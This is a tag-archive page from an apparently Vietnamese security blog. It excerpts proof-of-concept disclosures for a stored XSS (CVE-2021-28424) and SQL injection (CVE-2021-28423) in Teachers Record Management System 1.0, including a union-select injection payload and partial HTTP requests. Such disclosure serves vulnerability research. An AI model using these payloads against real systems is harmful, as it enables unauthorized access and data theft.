Tag Archives: CVE

Top các CVE được khai thác nhiều nhất mọi thời đại (2017-now, keep updated)

Sau đây là top các lỗ hổng được hacker ưa chuộng nhất mọi thời đại (mọi thời đại chỉ từ năm 2017 nhé ae :v). Có thể nói các bug hunter, hacker mà vớ được host có các lỗi này thì lại rất sướng, xiên không ngừng. Một phần các lỗi này ngày xưa cũngContinueContinue reading “Top các CVE được khai thác nhiều nhất mọi thời đại (2017-now, keep updated)”

[CVE-2021-28424] Teachers Record Management System 1.0 – ‘email’ Stored Cross-site Scripting (XSS) vulnerability (Authenticated)

# Exploit Author: nhattruong.blog# Referrer: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28424https://www.exploit-db.com/exploits/50019https://packetstormsecurity.com/files/163171/Teachers-Record-Management-System-1.0-Cross-Site-Scripting.html# Version: 1.0# Tested on: Windows 10 + XAMPP v3.2.4POC: Go to url http://localhost/admin/index.phpDo loginExecute the payloadReload page to see the different The entry point in ’email’ POST parameter in admin/adminprofile.php Payload: POST /admin/adminprofile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3ContinueContinue reading “[CVE-2021-28424] Teachers Record Management System 1.0 – ‘email’ Stored Cross-site Scripting (XSS) vulnerability (Authenticated)”

[CVE-2021-28423] Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)

# Exploit Author: nhattruong.bloghttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28423https://www.exploit-db.com/exploits/50018https://packetstormsecurity.com/files/163172/Teachers-Record-Management-System-1.0-SQL-Injection.html# Version: 1.0# Tested on: Windows 10 + XAMPP v3.2.4 POC: Go to url http://localhost/admin/index.phpDo loginExecute the payload SQLi #1: The entry point in ‘editid’ GET parameter in edit-subjects-detail.php http://local/admin/edit-subjects-detail.php?editid=-1 union select 1,user(),3– – SQLi #2: The entry point in ‘searchdata’ POST parameter in /admin/search.php POST /admin/search.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (WindowsContinueContinue reading “[CVE-2021-28423] Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)”